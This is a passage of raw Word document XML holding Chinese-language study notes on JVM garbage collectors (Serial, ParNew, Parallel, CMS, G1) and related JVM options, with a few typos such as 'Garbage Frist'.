          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>稍微解释下的是，</w:t>
      </w:r>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>并行算法是用多线程进行垃圾回收，回收期间会暂停程序的执行，而并发算法，也是多线程回收，但期间不停止应用执行。</w:t>
      </w:r>
      <w:r w:rsidRPr="002116B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>所以，并发算法适用于交互性高的一些程序。经过观察，并发算法会减少年轻代的大小，其实就是使用了一个大的年老代，这反过来跟并行算法相比吞吐量相对较低。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12A9F" w:rsidRDefault="00B12A9F" w:rsidP="00B12A9F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2.5.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>垃圾收集器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A71A33" w:rsidRDefault="00A71A33" w:rsidP="00B12A9F">
      <w:r w:rsidRPr="00A71A33">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A71A33">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>并行算法</w:t>
      </w:r>
      <w:r w:rsidRPr="00A71A33">
        <w:t>是用多线程进行垃圾回收，回收期间会暂停程序的执行，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00A71A33">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>并发算法</w:t>
      </w:r>
      <w:r w:rsidRPr="00A71A33">
        <w:t>，也是多线程回收，但期间不停止应用执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12A9F" w:rsidRDefault="00B12A9F" w:rsidP="00B12A9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Serial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12A9F" w:rsidRDefault="00B12A9F" w:rsidP="00B12A9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者一个线程去完成垃圾回收，必须</w:t>
      </w:r>
      <w:r w:rsidRPr="00B12A9F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>暂停其他所有的工作线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，直到垃圾回收结束。“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Stop The World</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在后台自动发起和自动完成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12A9F" w:rsidRDefault="00B12A9F" w:rsidP="00B12A9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>串行垃圾回收器是运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JVM Client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式下的默认新生代垃圾回收器，简单高效。桌面应用场景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内存不会很大</w:t>
      </w:r>
      <w:r w:rsidR="00446D6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00446D6D" w:rsidRPr="00446D6D" w:rsidRDefault="00446D6D" w:rsidP="00B12A9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>ParNew</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集器：使用多线程进行垃圾回收，其余行为与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Serial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集器是一样的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ParNew</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集器是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式下虚拟机中首选的</w:t>
      </w:r>
      <w:r w:rsidRPr="00446D6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>新生代收集器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ParNew</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集器是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE375E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>–XX:+UseConcMarkSweepGC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>选项后的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE375E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>默认新生代收集器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，也可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-XX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UseParNewGC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>选项强制指定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12A9F" w:rsidRPr="00B12A9F" w:rsidRDefault="00B12A9F" w:rsidP="00B12A9F"/>
    <w:p w:rsidR="00B12A9F" w:rsidRDefault="00B12A9F" w:rsidP="00B12A9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Parallel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B315CA" w:rsidRDefault="00B315CA" w:rsidP="00B12A9F"/>
    <w:p w:rsidR="00B12A9F" w:rsidRDefault="00B12A9F" w:rsidP="00B12A9F"/>
    <w:p w:rsidR="00B12A9F" w:rsidRDefault="00B12A9F" w:rsidP="00B12A9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Concurrent Mark Sweep(CMS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B315CA" w:rsidRDefault="00B315CA" w:rsidP="00B12A9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了获取最短回收停顿时间为目标的收集器。从名字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Mark Sweep)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看出，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集器就是“标记</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除”算法实现的，分为四个步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B315CA" w:rsidRDefault="00B315CA" w:rsidP="00B12A9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F1BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始标记</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B315CA" w:rsidRDefault="00B315CA" w:rsidP="00B12A9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F1BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并发标记</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B315CA" w:rsidRDefault="00B315CA" w:rsidP="00B12A9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F1BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新标记</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B315CA" w:rsidRPr="00B315CA" w:rsidRDefault="00B315CA" w:rsidP="00B12A9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F1BB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并发清除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12A9F" w:rsidRDefault="009F1BB9" w:rsidP="00B315CA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Stop the World</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。初始标记只是标记一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GC roots</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能直接关联到的对象，速度很快，并发标记阶段就是进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GC roots Tracing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的过程。重新标记就是修正并发标记期间因用户程序继续运动而导致标记产生变动的那一部分对象的标记记录，这个阶段的停顿时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>间一般会比初始标记阶段稍长一些，但远比并发标记的时间段。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD246B" w:rsidRPr="00B315CA" w:rsidRDefault="00FD246B" w:rsidP="00B315CA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并发的标记—清除</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Concurrent Mark Sweep,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缩写为</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CMS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集器</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使得在整个收集的过程中只是很短的暂停应用的执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可通过在</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JVM </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数中设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-XX:UseConcMarkSweepGC </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来使用此收集器</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>不过此收集器仅用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>old</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Perm(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>永生</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>的对象收集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00700177" w:rsidRDefault="00700177" w:rsidP="00B315CA"/>
    <w:p w:rsidR="00B12A9F" w:rsidRPr="00FD246B" w:rsidRDefault="00B12A9F" w:rsidP="00B315CA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Garbage Frist</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD246B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>收集器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00700177" w:rsidRDefault="00045681" w:rsidP="00B315CA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>JDK17 HostSpot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机的一个重要特征，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>垃圾回收器（简称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1 GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java HotSpot VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新引入的垃圾回收器，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java SE 6 Update 14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中已经包含了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的体验版本（据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>51CTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前的报导，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java SE 6 u14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月初登场时，原本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的声明是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>垃圾回收器需要收费方能使用。然而之后不久，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示这是一个误会，修改了原本的发布声明，并表示现在以及将来对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用都是完全免费的），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是设计用于替代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HotSpot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>低延迟的并行标记</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除垃圾回收器（也叫做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java 7 G1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A"/>
    <w:p w:rsidR="000A077A" w:rsidRDefault="000A077A" w:rsidP="000A077A">
      <w:r>
        <w:rPr>
